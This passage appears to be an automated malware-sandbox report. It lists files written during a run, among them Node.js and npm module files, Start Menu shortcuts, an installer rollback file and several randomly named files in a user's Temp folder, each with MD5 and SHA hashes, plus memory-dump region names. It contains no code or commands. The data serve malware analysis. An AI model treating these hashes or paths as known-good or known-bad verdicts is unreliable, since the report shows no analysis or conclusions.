SHA256 45e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0
SHA512 54e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16

C:\Program Files\nodejs\node_modules\npm\node_modules\promise-all-reject-late\LICENSE

MD5 7428aa9f83c500c4a434f8848ee23851
SHA1 166b3e1c1b7d7cb7b070108876492529f546219f
SHA256 1fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7
SHA512 c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce

C:\Program Files\nodejs\node_modules\npm\node_modules\aggregate-error\license

MD5 5ad87d95c13094fa67f25442ff521efd
SHA1 01f1438a98e1b796e05a74131e6bb9d66c9e8542
SHA256 67292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec
SHA512 7187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3

C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSE

MD5 d7c8fab641cd22d2cd30d2999cc77040
SHA1 d293601583b1454ad5415260e4378217d569538e
SHA256 04400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be
SHA512 278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764

C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.js

MD5 bc0c0eeede037aa152345ab1f9774e92
SHA1 56e0f71900f0ef8294e46757ec14c0c11ed31d4e
SHA256 7a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5
SHA512 5f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3

C:\Program Files\nodejs\node_modules\npm\node_modules\tar\node_modules\fs-minipass\node_modules\minipass\index.d.ts

MD5 f0bd53316e08991d94586331f9c11d97
SHA1 f5a7a6dc0da46c3e077764cfb3e928c4a75d383e
SHA256 dd3eda3596af30eda88b4c6c2156d3af6e7fa221f39c46e492c5e9fb697e2fef
SHA512 fd6affbaed67d09cf45478f38e92b8ca6c27650a232cbbeaff36e4f7554fb731ae44cf732378641312e98221539e3d8fabe80a7814e4f425026202de44eb5839

C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmorg\LICENSE

MD5 072ac9ab0c4667f8f876becedfe10ee0
SHA1 0227492dcdc7fb8de1d14f9d3421c333230cf8fe
SHA256 2ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013
SHA512 f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013

C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\LICENSE.md

MD5 2916d8b51a5cc0a350d64389bc07aef6
SHA1 c9d5ac416c1dd7945651bee712dbed4d158d09e1
SHA256 733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04
SHA512 508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74

C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-pipeline\node_modules\minipass\package.json

MD5 d116a360376e31950428ed26eae9ffd4
SHA1 192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b
SHA256 c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5
SHA512 5221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a

C:\Program Files\nodejs\node_modules\npm\node_modules\treeverse\LICENSE

MD5 1d7c74bcd1904d125f6aff37749dc069
SHA1 21e6dfe0fffc2f3ec97594aa261929a3ea9cf2ab
SHA256 24b8d53712087b867030d18f2bd6d1a72c78f9fb4dee0ce025374da25e4443b9
SHA512 b5ac03addd29ba82fc05eea8d8d09e0f2fa9814d0dd619c2f7b209a67d95b538c3c2ff70408641ef3704f6a14e710e56f4bf57c2bb3f8957ba164f28ee591778

memory/7160-2436-0x000001D41D350000-0x000001D41D356000-memory.dmp

memory/7160-2439-0x000001D41D6B0000-0x000001D41D6B6000-memory.dmp

C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmhook\LICENSE.md

MD5 e9dc66f98e5f7ff720bf603fff36ebc5
SHA1 f2b428eead844c4bf39ca0d0cf61f6b10aeeb93b
SHA256 b49c8d25a8b57fa92b2902d09c4b8a809157ee32fc10d17b7dbb43c4a8038f79
SHA512 8027d65e1556511c884cb80d3c1b846fc9d321f3f83002664ad3805c4dee8e6b0eaf1db81c459153977bdbde9e760b0184ba6572f68d78c37bff617646bcfc3b

C:\Program Files\nodejs\node_etw_provider.man

MD5 d3bc164e23e694c644e0b1ce3e3f9910
SHA1 1849f8b1326111b5d4d93febc2bafb3856e601bb
SHA256 1185aaa5af804c6bc6925f5202e68bb2254016509847cd382a015907440d86b4
SHA512 91ebff613f4c35c625bb9b450726167fb77b035666ed635acf75ca992c4846d952655a2513b4ecb8ca6f19640d57555f2a4af3538b676c3bd2ea1094c4992854

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js website.url

MD5 35b86e177ab52108bd9fed7425a9e34a
SHA1 76a1f47a10e3ab829f676838147875d75022c70c
SHA256 afaa6c6335bd3db79e46fb9d4d54d893cee9288e6bb4738294806a9751657319
SHA512 3c8047c94b789c8496af3c2502896cef2d348ee31618893b9b71244af667ec291dcb9b840f869eb984624660086db0c848d1846aa601893e6f9955e56da19f62

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js documentation.url

MD5 db7dbbc86e432573e54dedbcc02cb4a1
SHA1 cff9cfb98cff2d86b35dc680b405e8036bbbda47
SHA256 7cf8a9c96f9016132be81fd89f9573566b7dc70244a28eb59d573c2fdba1def9
SHA512 8f35f2e7dac250c66b209acecab836d3ecf244857b81bacebc214f0956ec108585990f23ff3f741678e371b0bee78dd50029d0af257a3bb6ab3b43df1e39f2ec

C:\Config.Msi\e57ab18.rbs

MD5 bb61161e3c56f97a0000a5886f638371
SHA1 b705c1b21f083a12af28e812abaca583e4820c4f
SHA256 206f38f63300efcd5df1e067ef451ed660b1f629dd86248280663851134e9700
SHA512 20aa01c0c6598a7da5afbc7026b4ff2b8682627f8da3373271405a094f1800521b20e546da224ec2d4e63d3b90b40408f25f871e2a0d42378fbec34ce618b3a5

C:\Users\Admin\AppData\Local\Temp\giPXNxELJZ

MD5 a603e09d617fea7517059b4924b1df93
SHA1 31d66e1496e0229c6a312f8be05da3f813b3fa9e
SHA256 ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7
SHA512 eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

C:\Users\Admin\AppData\Local\Temp\YA3l3xUIWB

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Temp\S5uLH4IzQp

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Temp\6YRq7pmyBz

MD5 93033b50faaecfc1f3413dd113d4f365
SHA1 a04840585ab5160bad05c13aabe2a875416b0d79
SHA256 51ac570ca79b6f12f89240532e24cf26a9cab7e982b6570e54b10769c6f60e25
SHA512 986351814483f2072bf4b83a5bcd221be88f888f90f85ce588807e354b9716e96e0f238735740b6217bfd28ffc75eedeabb2d56d1a10a384ced5501b346611ce

memory/4764-3029-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4764-3032-0x0000000140000000-0x0000000140786000-memory.dmp